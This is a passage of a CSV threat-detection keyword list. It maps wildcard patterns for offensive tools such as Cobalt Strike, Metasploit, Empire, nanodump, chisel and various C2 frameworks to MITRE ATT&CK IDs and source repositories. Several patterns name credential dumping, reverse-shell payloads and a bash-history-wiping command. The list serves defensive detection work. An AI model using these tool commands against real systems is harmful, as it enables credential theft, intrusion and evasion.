T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*lmhash*aad3b435b51404eeaad3b435b51404ee*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*ln -sf /dev/null *bash_history*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. 
","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*lneaocagcijjdpkcabeanfpdbmapcjjg*","greyware_tool_keyword","Hub VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*lnfdmdhmfbimhhpaeocncdlhiodoblbd*","greyware_tool_keyword","VPN PROXY MASTER","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*lnk-generate.py --host * --type ntlm --output *.lnk*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*lnx_keylogger.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*load aggressor 
script*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" +"*load incognito*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Incognito","10","10","N/A","N/A","N/A","N/A" +"*load kiwi*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Mimikatz","10","10","N/A","N/A","N/A","N/A" +"*load_sc.exe *.bin*","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","0","N/A","10","10","145","25","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z" +"*load_ssp *.dll*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*Load-BeaconParameters*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" +"*Load-Bof(*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" +"*loaddll64.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*loader/inject.c*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*loader/inject_local.c*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*loader/loader/loader.c*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" +"*loader_exe_x64.*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*loader_exe_x86.*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*LoadEWSDLL*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*loadKirbiFile*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*loadliba_reverse_tcp.asm*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*loadliba_shell.asm*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*loadliba_single_shell_reverse_tcp.asm*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*loadmodule *.ps1*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - 
T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*loadmodume */modules/*.ps1**","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Local: crc32 compensation attack*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*Local:Get-DelegateType*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Local:Get-PEArchitecture*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Local:Get-ProcAddress*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-local=0.0.0.0:4001*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*localexploit_demo_template.erb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*localhost/pipe/pwned*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"*localhost:1337*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*localhost:1337*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*localhost:3000*striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*localhost:31337*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*localhost:3333*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*localhost:4567*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" +"*localhost:4782*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. 
The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*localhost:53531*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*localhost:8022*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" +"*localhost:8848*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*localpotato -i*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*LocalPotato.cpp*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*LocalPotato.exe*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*LocalPotato.sln*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege 